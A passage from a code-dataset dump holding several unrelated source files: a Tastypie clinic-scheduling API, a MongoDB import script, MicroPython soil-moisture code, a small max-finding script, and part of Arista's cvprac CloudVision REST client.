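# Note: as with the resources above, these Tastypie relation fields serialize as the\n    # related resource's URI by default (full=False); passing full=True embeds the object.\n    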
referral = fields.ForeignKey('visit.api.ReferralResource', 'referral', null=True)\n    who_deleted = fields.ForeignKey('core.api.UserResource', 'who_deleted', null=True)\n\n    def obj_create(self, bundle, request=None, **kwargs):\n        kwargs['operator'] = request.user\n        referral = request and request.active_profile.staff.referral\n        if referral:\n            kwargs['referral'] = referral\n        result = super(ExtPreorderResource, self).obj_create(bundle=bundle, request=request, **kwargs)\n        return result\n\n    def obj_update(self, bundle, request=None, **kwargs):\n        if bundle.data['deleted']:\n            bundle.data['who_deleted'] = request.user\n        result = super(ExtPreorderResource, self).obj_update(bundle=bundle, request=request, **kwargs)\n        return result\n\n    def build_filters(self, filters=None):\n        if filters is None:\n            filters = {}\n\n        orm_filters = super(ExtPreorderResource, self).build_filters(filters)\n\n        if \"search\" in filters:\n            smart_filters = smartFilter(filters['search'], 'patient')\n            if len(smart_filters.keys()) == 1:\n                try:\n                    orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n                                               | Q(**smart_filters), **orm_filters)\n                except:\n                    orm_filters.update(**smart_filters)\n            else:\n                orm_filters.update(**smart_filters)\n        return orm_filters\n\n    def dehydrate(self, bundle):\n        obj = bundle.obj\n        bundle.data['service_name'] = obj.service and obj.service.base_service.name\n        bundle.data['patient_name'] = obj.patient and obj.patient.full_name() or u'Пациент не указан'\n        bundle.data['patient_birthday'] = obj.patient and obj.patient.birth_day\n        bundle.data['ptype_name'] = obj.get_payment_type_display()\n        bundle.data['execution_place'] = obj.service and obj.service.state_id\n        bundle.data['execution_place_name'] = obj.service and obj.service.state.name\n        bundle.data['promotion_name'] = obj.promotion and obj.promotion.name or ''\n        bundle.data['promo_discount'] = obj.promotion and obj.promotion.discount and obj.promotion.discount_id or ''\n        bundle.data['staff'] = obj.timeslot and obj.timeslot.cid\n        bundle.data['staff_name'] = obj.timeslot and obj.timeslot.cid and obj.get_staff_name()\n        bundle.data['price'] = obj.price or (obj.service and obj.service.get_actual_price(payment_type=obj.payment_type))\n        bundle.data['start'] = obj.timeslot and obj.timeslot.start\n        bundle.data['base_service'] = obj.service and obj.service.base_service_id\n        bundle.data['patient_phone'] = obj.patient and obj.patient.mobile_phone\n        bundle.data['operator_name'] = obj.operator or ''\n        bundle.data['branches'] = obj.service and bundle.obj.service.branches.all().values_list('id', flat=True)\n        bundle.data['referral_name'] = obj.referral and obj.referral.__unicode__()\n        return bundle\n\n    class Meta:\n        queryset = Preorder.objects.filter(deleted=False).select_related().order_by('-timeslot__start')\n        resource_name = 'extpreorder'\n        authorization = DjangoAuthorization()\n        always_return_data = True\n        filtering = {\n            'deleted': ALL,\n            'patient': ALL,\n            'start': ALL,\n            'timeslot': ALL_WITH_RELATIONS,\n            'service': ALL_WITH_RELATIONS,\n            'visit': ALL_WITH_RELATIONS,\n            'card': ALL_WITH_RELATIONS,\n            'payment_type': ALL,\n            'id': ALL\n        }\n        limit = 500\n        list_allowed_methods = ['get', 'post', 'put']\n\n\nclass VisitPreorderResource(ExtPreorderResource):\n    \"\"\"\n    Used on the visit form when selecting a preorder.\n    Contains preorders that have not yet been registered, starting from today, as well as referrals.\n    \"\"\"\n\n    def build_filters(self, filters=None):\n        if filters is None:\n            filters = {}\n\n        orm_filters = super(VisitPreorderResource, 
self).build_filters(filters)\n\n        if \"search\" in filters:\n            smart_filters = smartFilter(filters['search'], 'patient')\n            if len(smart_filters.keys()) == 1:\n                try:\n                    orm_filters = ComplexQuery(Q(barcode__id=int(filters['search']))\\\n                                               | Q(**smart_filters), **orm_filters)\n                except:\n                    orm_filters.update(**smart_filters)\n            else:\n                orm_filters.update(**smart_filters)\n        return orm_filters\n\n    class Meta:\n        queryset = Preorder.objects.filter(timeslot__isnull=True).order_by('-expiration')\n        resource_name = 'visitpreorder'\n        authorization = DjangoAuthorization()\n        always_return_data = True\n        filtering = {\n            'deleted': ALL,\n            'patient': ALL,\n            'start': ALL,\n            'expiration': ALL,\n            'timeslot': ALL_WITH_RELATIONS,\n            'service': ALL_WITH_RELATIONS,\n            'visit': ALL_WITH_RELATIONS,\n            'card': ALL_WITH_RELATIONS,\n            'payment_type': ALL\n        }\n        limit = 500\n        list_allowed_methods = ['get', 'post', 'put']\n\n\napi = Api(api_name='scheduler')\n\napi.register(RejectionCauseResource())\napi.register(CalendarResource())\napi.register(PreorderResource())\napi.register(ExtPreorderResource())\napi.register(EventResource())\napi.register(VisitPreorderResource())\n","sub_path":"apps/scheduler/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"585926421","text":"# 64. Building the MongoDB database\n# Register the artist information (artist.json.gz) in the database.\n# In addition, create indexes on the following fields:\n# name, aliases.name, tags.value, rating.value\n\nfrom pymongo import MongoClient, ASCENDING\nimport gzip\nimport json\n\n\ndef init():\n    client = MongoClient(\"localhost\", 27017)\n    db = client.nlp100_knock\n    col = db.artists\n\n    i = 0\n    pipeline = []\n    for line in gzip.open(\"../data/artist.json.gz\", \"rt\", encoding=\"utf-8\"):\n        artist = json.loads(line)\n        pipeline.append(artist)\n        i += 1\n        if i % 100000 == 0 and pipeline:\n            col.insert_many(pipeline)\n            pipeline = []\n\n    if pipeline:\n        col.insert_many(pipeline)\n    print(f\"stored {i} items\")\n\n    for index in [\"name\", \"aliases.name\", \"tags.value\", \"rating.value\"]:\n        col.create_index([(index, ASCENDING)])\n\n\nif __name__ == \"__main__\":\n    init()\n","sub_path":"takahashi/chapter07/knock64.py","file_name":"knock64.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646645834","text":"from machine import ADC, Pin\n\n\nled = Pin(2, Pin.OUT)\nvPin = ADC(Pin(34))\nvPin.atten(ADC.ATTN_11DB)\n# 11DB attenuation allows for a maximum input voltage\n# of approximately 3.6v (default is 0-1.0v)\n\n# RE: https://www.vegetronix.com/Curves/VH400-RevA/VG400-RevA-Curves.phtml\ncurve_data = {\n    0: 0,\n    .6: 5,\n    1.1: 10,\n    1.3: 15,\n    1.4: 20,\n    1.5: 25,\n    1.6: 30,\n    1.7: 35,\n    1.8: 40,\n    2.0: 45,\n    2.2: 50,\n    3.3: 50\n}\n\n# Volumetric Water Content is a piecewise function\n# of the voltage from the sensor\n# this function returns the closest vwc value (below)\n# the current sensor reading\n\n\ndef get_vwc(sensor_voltage):\n    sensor_voltage = float(sensor_voltage)\n    if not sensor_voltage:\n        return 0\n    return curve_data[max(key for key in map(float, curve_data.keys()) if key <= sensor_voltage)]\n\n\ndef readSoilMoisture():\n    led.value(1)\n    sensor_value = vPin.read()\n    sensor_voltage = sensor_value / 1000  # rough conversion of the raw ADC reading to volts\n    soil_vwc = get_vwc(sensor_voltage)\n    #moisture_percentage = 100.00 * (sensor_voltage / 3.3)\n\n    print('sensor_value: ', sensor_value)\n    print('sensor_voltage: ', sensor_voltage)\n    
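# e.g. get_vwc(1.35) == 15: the largest curve_data key <= 1.35 is 1.3, which maps to 15% VWC\n    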
print('soil_vwc: ', soil_vwc)\n\n led.value(0)\n return sensor_value, sensor_voltage, soil_vwc\n","sub_path":"src/moisture.py","file_name":"moisture.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"249058395","text":"n = input(\"Enter count of numbers: \")\nn = int(n)\n\ncount = 1\nnumbers = []\n\nwhile count <= n:\n number = input(\"Enter number: \")\n number = int(number)\n numbers = numbers + [number]\n count += 1\n \ni = 0\nmax_number = numbers[0]\n\nfor number in numbers:\n if max_number < number:\n max_number = number\n\nprint(\"Max is: \" + str(max_number))\n \n","sub_path":"week2/List-Problems/max_of_n.py","file_name":"max_of_n.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265664354","text":"#\n# Copyright (c) 2017, Arista Networks, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# Neither the name of Arista Networks nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ARISTA NETWORKS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN\n# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n''' Class containing calls to CVP RESTful API.\n'''\nimport urllib\nfrom cvprac.cvp_client_errors import CvpApiError\n\n\nclass CvpApi(object):\n ''' CvpApi class contains calls to CVP RESTful API. The RESTful API\n parameters are passed in as parameters to the method. The results of\n the RESTful API call are converted from json to a dict and returned.\n Where needed minimal processing is performed on the results.\n Any method that does a cvprac get or post call could raise the\n following errors:\n\n ConnectionError: A ConnectionError is raised if there was a network\n problem (e.g. 
DNS failure, refused connection, etc)\n CvpApiError: A CvpApiError is raised if there was a JSON error.\n CvpRequestError: A CvpRequestError is raised if the request is not\n properly constructed.\n CvpSessionLogOutError: A CvpSessionLogOutError is raised if\n reponse from server indicates session was logged out.\n HTTPError: A HTTPError is raised if there was an invalid HTTP response.\n ReadTimeout: A ReadTimeout is raised if there was a request\n timeout when reading from the connection.\n Timeout: A Timeout is raised if there was a request timeout.\n TooManyRedirects: A TooManyRedirects is raised if the request exceeds\n the configured number of maximum redirections\n ValueError: A ValueError is raised when there is no valid\n CVP session. This occurs because the previous get or post request\n failed and no session could be established to a CVP node. Destroy\n the class and re-instantiate.\n '''\n # pylint: disable=too-many-public-methods\n # pylint: disable=too-many-lines\n\n def __init__(self, clnt, request_timeout=30):\n ''' Initialize the class.\n\n Args:\n clnt (obj): A CvpClient object\n '''\n self.clnt = clnt\n self.log = clnt.log\n self.request_timeout = request_timeout\n\n def get_cvp_info(self):\n ''' Returns information about CVP.\n\n Returns:\n cvp_info (dict): CVP Information\n '''\n return self.clnt.get('/cvpInfo/getCvpInfo.do',\n timeout=self.request_timeout)\n\n def get_task_by_id(self, task_id):\n ''' Returns the current CVP Task status for the task with the specified\n TaskId.\n\n Args:\n task_id (int): CVP task identifier\n\n Returns:\n task (dict): The CVP task for the associated Id. Returns None\n if the task_id was invalid.\n '''\n self.log.debug('get_task_by_id: task_id: %s' % task_id)\n try:\n task = self.clnt.get('/task/getTaskById.do?taskId=%s' % task_id,\n timeout=self.request_timeout)\n except CvpApiError as error:\n self.log.debug('Caught error: %s attempting to get task.' % error)\n # Catch an invalid task_id error and return None\n return None\n return task\n\n def get_tasks_by_status(self, status, start=0, end=0):\n ''' Returns a list of tasks with the given status.\n\n Args:\n status (str): Task status\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n tasks (list): The list of tasks\n '''\n self.log.debug('get_tasks_by_status: status: %s' % status)\n data = self.clnt.get(\n '/task/getTasks.do?queryparam=%s&startIndex=%d&endIndex=%d' %\n (status, start, end), timeout=self.request_timeout)\n return data['data']\n\n def get_tasks(self, start=0, end=0):\n ''' Returns a list of all the tasks.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n tasks (dict): The 'total' key contains the number of tasks,\n the 'data' key contains a list of the tasks.\n '''\n self.log.debug('get_tasks:')\n return self.clnt.get('/task/getTasks.do?queryparam=&startIndex=%d&'\n 'endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_logs_by_id(self, task_id, start=0, end=0):\n ''' Returns the log entries for the task with the specified TaskId.\n\n Args:\n task_id (int): CVP task identifier\n start (int): The first log entry to return. Default is 0.\n end (int): The last log entry to return. Default is 0 which\n means to return all log entries. 
Can be a large number to\n indicate the last log entry.\n\n Returns:\n task (dict): The CVP log for the associated Id. Returns None\n if the task_id was invalid.\n '''\n self.log.debug('get_log_by_id: task_id: %s' % task_id)\n return self.clnt.get('/task/getLogsById.do?id=%s&queryparam='\n '&startIndex=%d&endIndex=%d' %\n (task_id, start, end),\n timeout=self.request_timeout)\n\n def add_note_to_task(self, task_id, note):\n ''' Add notes to the task.\n\n Args:\n task_id (str): Task ID\n note (str): Note to add to the task\n '''\n self.log.debug('add_note_to_task: task_id: %s note: %s' %\n (task_id, note))\n data = {'workOrderId': task_id, 'note': note}\n self.clnt.post('/task/addNoteToTask.do', data=data,\n timeout=self.request_timeout)\n\n def execute_task(self, task_id):\n ''' Execute the task. Note that if the task has failed then inspect\n the task logs to determine why the task failed. If you see:\n\n Failure response received from the netElement: Unauthorized User\n\n then it means that the netelement does not have the same user ID\n and/or password as the CVP user executing the task.\n\n Args:\n task_id (str): Task ID\n '''\n self.log.debug('execute_task: task_id: %s' % task_id)\n data = {'data': [task_id]}\n self.clnt.post('/task/executeTask.do', data=data,\n timeout=self.request_timeout)\n\n def cancel_task(self, task_id):\n ''' Cancel the task\n\n Args:\n task_id (str): Task ID\n '''\n self.log.debug('cancel_task: task_id: %s' % task_id)\n data = {'data': [task_id]}\n self.clnt.post('/task/cancelTask.do', data=data,\n timeout=self.request_timeout)\n\n def get_configlet_by_name(self, name):\n ''' Returns the configlet with the specified name\n\n Args:\n name (str): Name of the configlet. Can contain spaces.\n\n Returns:\n configlet (dict): The configlet dict.\n '''\n self.log.debug('get_configlets_by_name: name: %s' % name)\n return self.clnt.get('/configlet/getConfigletByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n\n def get_configlet_history(self, key, start=0, end=0):\n ''' Returns the configlet history.\n\n Args:\n key (str): Key for the configlet.\n start (int): The first configlet entry to return. Default is 0\n end (int): The last configlet entry to return. Default is 0\n which means to return all configlet entries. Can be a\n large number to indicate the last configlet entry.\n\n Returns:\n history (dict): The configlet dict with the changes from\n most recent to oldest.\n '''\n self.log.debug('get_configlets_history: key: %s' % key)\n return self.clnt.get('/configlet/getConfigletHistory.do?configletId='\n '%s&queryparam=&startIndex=%d&endIndex=%d' %\n (key, start, end), timeout=self.request_timeout)\n\n def get_inventory(self, start=0, end=0, query=''):\n ''' Returns the a dict of the net elements known to CVP.\n\n Args:\n start (int): The first inventory entry to return. Default is 0\n end (int): The last inventory entry to return. Default is 0\n which means to return all inventory entries. Can be a\n large number to indicate the last inventory entry.\n query (string): A value that can be used as a match to filter\n returned inventory list. 
For example get all switches that\n are running a specific version of EOS.\n '''\n self.log.debug('get_inventory: called')\n data = self.clnt.get('/inventory/getInventory.do?'\n 'queryparam=%s&startIndex=%d&endIndex=%d' %\n (urllib.quote_plus(query), start, end),\n timeout=self.request_timeout)\n return data['netElementList']\n\n def add_device_to_inventory(self, device_ip, parent_name, parent_key):\n ''' Add the device to the specified parent container.\n\n Args:\n device_ip (str): ip address of device we are adding\n parent_name (str): Parent container name\n parent_key (str): Parent container key\n '''\n self.log.debug('add_device_to_inventory: called')\n data = {'data': [\n {\n 'containerName' : parent_name,\n 'containerId' : parent_key,\n 'containerType' : 'Existing',\n 'ipAddress' : device_ip,\n 'containerList' : []\n }]}\n self.clnt.post('/inventory/add/addToInventory.do?'\n 'startIndex=0&endIndex=0', data=data,\n timeout=self.request_timeout)\n\n def retry_add_to_inventory(self, device_mac, device_ip, username,\n password):\n '''Retry addition of device to Cvp inventory\n\n Args:\n device_mac (str): MAC address of device\n device_ip (str): ip address assigned to device\n username (str): username for device login\n password (str): password for user\n '''\n self.log.debug('retry_add_to_inventory: called')\n data = {\"key\" : device_mac,\n \"ipAddress\" : device_ip,\n \"userName\" : username,\n \"password\" : password}\n self.clnt.post('/inventory/add/retryAddDeviceToInventory.do?'\n 'startIndex=0&endIndex=0',\n data=data,\n timeout=self.request_timeout)\n\n def delete_device(self, device_mac):\n '''Delete the device and its pending tasks from Cvp inventory\n\n Args:\n device_mac (str): mac address of device we are deleting\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('delete_device: called')\n return self.delete_devices([device_mac])\n\n def delete_devices(self, device_macs):\n '''Delete the device and its pending tasks from Cvp inventory\n\n Args:\n device_macs (list): list of mac address for\n devices we're deleting\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('delete_devices: called')\n data = {'data': device_macs}\n return self.clnt.post('/inventory/deleteDevices.do?', data=data,\n timeout=self.request_timeout)\n\n def get_non_connected_device_count(self):\n '''Returns number of devices not accessible/connected in the temporary\n inventory.\n\n Returns:\n data (int): Number of temporary inventory devices not\n accessible/connected\n '''\n self.log.debug('get_non_connected_device_count: called')\n data = self.clnt.get('/inventory/add/getNonConnectedDeviceCount.do',\n timeout=self.request_timeout)\n return data['data']\n\n def save_inventory(self):\n '''Saves Cvp inventory state\n '''\n self.log.debug('save_inventory: called')\n return self.clnt.post('/inventory/add/saveInventory.do',\n timeout=self.request_timeout)\n\n def get_devices_in_container(self, name):\n ''' Returns a dict of the devices under the named container.\n\n Args:\n name (str): The name of the container to get devices from\n '''\n self.log.debug('get_devices_in_container: called')\n devices = []\n container = self.get_container_by_name(name)\n if container:\n data = self.clnt.get('/inventory/getInventory.do?'\n 'queryparam=%s&startIndex=0&'\n 'endIndex=0' % urllib.quote_plus(name),\n timeout=self.request_timeout)\n for device in data['netElementList']:\n if device['parentContainerId'] == container['key']:\n devices.append(device)\n 
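# getInventory matches by name; the parentContainerId check above keeps only devices\n        # that sit directly under this container (devices in child containers are excluded)\n        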
return devices\n\n def get_device_by_name(self, fqdn):\n ''' Returns the net element device dict for the devices fqdn name.\n\n Args:\n fqdn (str): Fully qualified domain name of the device.\n\n Returns:\n device (dict): The net element device dict for the device if\n otherwise returns an empty hash.\n '''\n self.log.debug('get_device_by_name: fqdn: %s' % fqdn)\n data = self.get_inventory(start=0, end=0, query=fqdn)\n if len(data) > 0:\n for netelement in data:\n if netelement['fqdn'] == fqdn:\n device = netelement\n break\n else:\n device = {}\n else:\n device = {}\n return device\n\n def get_containers(self, start=0, end=0):\n ''' Returns a list of all the containers.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n containers (dict): The 'total' key contains the number of\n containers, the 'data' key contains a list of the containers\n with associated info.\n '''\n self.log.debug('Get list of containers')\n return self.clnt.get('/inventory/add/searchContainers.do?'\n 'startIndex=%d&endIndex=%d' % (start, end))\n\n def get_container_by_name(self, name):\n ''' Returns a container that exactly matches the name.\n\n Args:\n name (str): String to search for in container names.\n\n Returns:\n container (dict): Container info in dictionary format or None\n '''\n self.log.debug('Get info for container %s' % name)\n conts = self.clnt.get('/provisioning/searchTopology.do?queryParam=%s'\n '&startIndex=0&endIndex=0'\n % urllib.quote_plus(name))\n if conts['total'] > 0 and conts['containerList']:\n for cont in conts['containerList']:\n if cont['name'] == name:\n return cont\n return None\n\n def get_configlets_by_device_id(self, mac, start=0, end=0):\n ''' Returns the list of configlets applied to a device.\n\n Args:\n mac (str): Device mac address (i.e. device id)\n start (int): The first configlet entry to return. Default is 0\n end (int): The last configlet entry to return. Default is 0\n which means to return all configlet entries. 
Can be a\n large number to indicate the last configlet entry.\n\n Returns:\n configlets (list): The list of configlets applied to the device\n '''\n self.log.debug('get_configlets_by_device: mac: %s' % mac)\n data = self.clnt.get('/provisioning/getConfigletsByNetElementId.do?'\n 'netElementId=%s&queryParam=&startIndex=%d&'\n 'endIndex=%d' % (mac, start, end),\n timeout=self.request_timeout)\n return data['configletList']\n\n def add_configlet(self, name, config):\n ''' Add a configlet and return the key for the configlet.\n\n Args:\n name (str): Configlet name\n config (str): Switch config statements\n\n Returns:\n key (str): The key for the configlet\n '''\n self.log.debug('add_configlet: name: %s config: %s' % (name, config))\n body = {'name': name, 'config': config}\n # Create the configlet\n self.clnt.post('/configlet/addConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n # Get the key for the configlet\n data = self.clnt.get('/configlet/getConfigletByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n return data['key']\n\n def delete_configlet(self, name, key):\n ''' Delete the configlet.\n\n Args:\n name (str): Configlet name\n key (str): Configlet key\n '''\n self.log.debug('delete_configlet: name: %s key: %s' % (name, key))\n body = [{'name': name, 'key': key}]\n # Delete the configlet\n self.clnt.post('/configlet/deleteConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n def update_configlet(self, config, key, name):\n ''' Update a configlet.\n\n Args:\n config (str): Switch config statements\n key (str): Configlet key\n name (str): Configlet name\n\n Returns:\n data (dict): Contains success or failure message\n '''\n self.log.debug('update_configlet: config: %s key: %s name: %s' %\n (config, key, name))\n\n # Update the configlet\n body = {'config': config, 'key': key, 'name': name}\n return self.clnt.post('/configlet/updateConfiglet.do', data=body,\n timeout=self.request_timeout)\n\n def validate_config(self, device_mac, config):\n ''' Validate a config against a device\n\n Args:\n device_mac (str): Device MAC address\n config (str): Switch config statements\n\n Returns:\n response (dict): A dict that contains the result of the\n validation operation\n '''\n self.log.debug('validate_config: name: %s config: %s'\n % (device_mac, config))\n body = {'netElementId': device_mac, 'config': config}\n # Invoke the validate API call\n result = self.clnt.post('/configlet/validateConfig.do', data=body,\n timeout=self.request_timeout)\n validated = True\n if 'warningCount' in result and result['warnings']:\n for warning in result['warnings']:\n self.log.warning('Validation of config produced warning - %s'\n % warning)\n if 'errorCount' in result:\n self.log.error('Validation of config produced %s errors'\n % result['errorCount'])\n if 'errors' in result:\n for error in result['errors']:\n self.log.error('Validation of config produced error - %s'\n % error)\n validated = False\n if 'result' in result:\n for item in result['result']:\n if 'messages' in item:\n for message in item['messages']:\n self.log.info('Validation of config returned'\n ' message - %s' % message)\n return validated\n\n def _add_temp_action(self, data):\n ''' Adds temp action that requires a saveTopology call to take effect.\n\n Args:\n data (dict): a data dict with a specific format for the\n desired action.\n\n Base Ex: data = {'data': [{specific key/value pairs}]}\n '''\n url = ('/provisioning/addTempAction.do?'\n 'format=topology&queryParam=&nodeId=root')\n 
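# the action dicts built in apply_configlets_to_device and _container_op below are\n        # fully populated instances of this 'data' payload\n        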
self.clnt.post(url, data=data, timeout=self.request_timeout)\n\n def _save_topology_v2(self, data):\n ''' Confirms a previously created temp action.\n\n Args:\n data (list): a list that contains a dict with a specific\n format for the desired action. Our primary use case is for\n confirming existing temp actions so we most often send an\n empty list to confirm an existing temp action.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n url = '/provisioning/v2/saveTopology.do'\n return self.clnt.post(url, data=data, timeout=self.request_timeout)\n\n def apply_configlets_to_device(self, app_name, dev, new_configlets,\n create_task=True):\n ''' Apply the configlets to the device.\n\n Args:\n app_name (str): The application name to use in info field.\n dev (dict): The switch device dict\n new_configlets (list): List of configlet name and key pairs\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n self.log.debug('apply_configlets_to_device: dev: %s names: %s' %\n (dev, new_configlets))\n # Get all the configlets assigned to the device.\n configlets = self.get_configlets_by_device_id(dev['systemMacAddress'])\n\n # Get a list of the names and keys of the configlets\n cnames = []\n ckeys = []\n for configlet in configlets:\n cnames.append(configlet['name'])\n ckeys.append(configlet['key'])\n\n # Add the new configlets to the end of the arrays\n for entry in new_configlets:\n cnames.append(entry['name'])\n ckeys.append(entry['key'])\n\n info = '%s: Configlet Assign: to Device %s' % (app_name, dev['fqdn'])\n info_preview = 'Configlet Assign: to Device' + dev['fqdn']\n data = {'data': [{'info': info,\n 'infoPreview': info_preview,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'configlet',\n 'nodeId': '',\n 'configletList': ckeys,\n 'configletNamesList': cnames,\n 'ignoreConfigletNamesList': [],\n 'ignoreConfigletList': [],\n 'configletBuilderList': [],\n 'configletBuilderNamesList': [],\n 'ignoreConfigletBuilderList': [],\n 'ignoreConfigletBuilderNamesList': [],\n 'toId': dev['systemMacAddress'],\n 'toIdType': 'netelement',\n 'fromId': '',\n 'nodeName': '',\n 'fromName': '',\n 'toName': dev['fqdn'],\n 'nodeIpAddress': dev['ipAddress'],\n 'nodeTargetIpAddress': dev['ipAddress'],\n 'childTasks': [],\n 'parentTask': ''}]}\n self.log.debug('apply_configlets_to_device: saveTopology data:\\n%s' %\n data['data'])\n self._add_temp_action(data)\n if create_task:\n return self._save_topology_v2([])\n\n # pylint: disable=too-many-locals\n def remove_configlets_from_device(self, app_name, dev, del_configlets,\n create_task=True):\n ''' Remove the configlets from the device.\n\n Args:\n app_name (str): The application name to use in info field.\n dev (dict): The switch device dict\n del_configlets (list): List of configlet name and key pairs\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'35']}}\n '''\n self.log.debug('remove_configlets_from_device: dev: %s names: %s' %\n (dev, del_configlets))\n\n # Get all the configlets assigned to the device.\n configlets 
= self.get_configlets_by_device_id(dev['systemMacAddress'])\n\n        # Get a list of the names and keys of the configlets. Do not add\n        # configlets that are on the delete list.\n        keep_names = []\n        keep_keys = []\n        for configlet in configlets:\n            key = configlet['key']\n            if next((ent for ent in del_configlets if ent['key'] == key),\n                    None) is None:\n                keep_names.append(configlet['name'])\n                keep_keys.append(key)\n\n        # Build the lists of configlet names and keys to remove.\n        del_names = []\n        del_keys = []\n        for entry in del_configlets:\n            del_names.append(entry['name'])\n            del_keys.append(entry['key'])\n\n        info = '%s Configlet Remove: from Device %s' % (app_name, dev['fqdn'])\n        info_preview = 'Configlet Remove: from Device ' + dev['fqdn']\n        data = {'data': [{'info': info,\n                          'infoPreview': info_preview,\n                          'note': '',\n                          'action': 'associate',\n                          'nodeType': 'configlet',\n                          'nodeId': '',\n                          'configletList': keep_keys,\n                          'configletNamesList': keep_names,\n                          'ignoreConfigletNamesList': del_names,\n                          'ignoreConfigletList': del_keys,\n                          'configletBuilderList': [],\n                          'configletBuilderNamesList': [],\n                          'ignoreConfigletBuilderList': [],\n                          'ignoreConfigletBuilderNamesList': [],\n                          'toId': dev['systemMacAddress'],\n                          'toIdType': 'netelement',\n                          'fromId': '',\n                          'nodeName': '',\n                          'fromName': '',\n                          'toName': dev['fqdn'],\n                          'nodeIpAddress': dev['ipAddress'],\n                          'nodeTargetIpAddress': dev['ipAddress'],\n                          'childTasks': [],\n                          'parentTask': ''}]}\n        self.log.debug('remove_configlets_from_device: saveTopology data:\\n%s'\n                       % data['data'])\n        self._add_temp_action(data)\n        if create_task:\n            return self._save_topology_v2([])\n\n    # pylint: disable=too-many-arguments\n    def _container_op(self, container_name, container_key, parent_name,\n                      parent_key, operation):\n        ''' Perform the operation on the container.\n\n        Args:\n            container_name (str): Container name\n            container_key (str): Container key, can be empty for add.\n            parent_name (str): Parent container name\n            parent_key (str): Parent container key\n            operation (str): Container operation 'add' or 'delete'.\n\n        Returns:\n            response (dict): A dict that contains a status and a list of\n                task ids created (if any).\n\n                Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n        '''\n        msg = ('%s container %s under container %s' %\n               (operation, container_name, parent_name))\n        data = {'data': [{'info': msg,\n                          'infoPreview': msg,\n                          'action': operation,\n                          'nodeType': 'container',\n                          'nodeId': container_key,\n                          'toId': '',\n                          'fromId': '',\n                          'nodeName': container_name,\n                          'fromName': '',\n                          'toName': '',\n                          'childTasks': [],\n                          'parentTask': '',\n                          'toIdType': 'container'}]}\n        if operation == 'add':  # compare string values with '==' ('is' checks identity, not equality)\n            data['data'][0]['toId'] = parent_key\n            data['data'][0]['toName'] = parent_name\n        elif operation == 'delete':\n            data['data'][0]['fromId'] = parent_key\n            data['data'][0]['fromName'] = parent_name\n\n        # Perform the container operation\n        self._add_temp_action(data)\n        return self._save_topology_v2([])\n\n    def add_container(self, container_name, parent_name, parent_key):\n        ''' Add the container to the specified parent.\n\n        Args:\n            container_name (str): Container name\n            parent_name (str): Parent container name\n            parent_key (str): Parent container key\n\n        Returns:\n            response (dict): A dict that contains a status and a list of\n                task ids created (if any).\n\n                Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n        '''\n        self.log.debug('add_container: container: %s parent: %s parent_key: %s'\n                       % (container_name, parent_name, parent_key))\n        return 
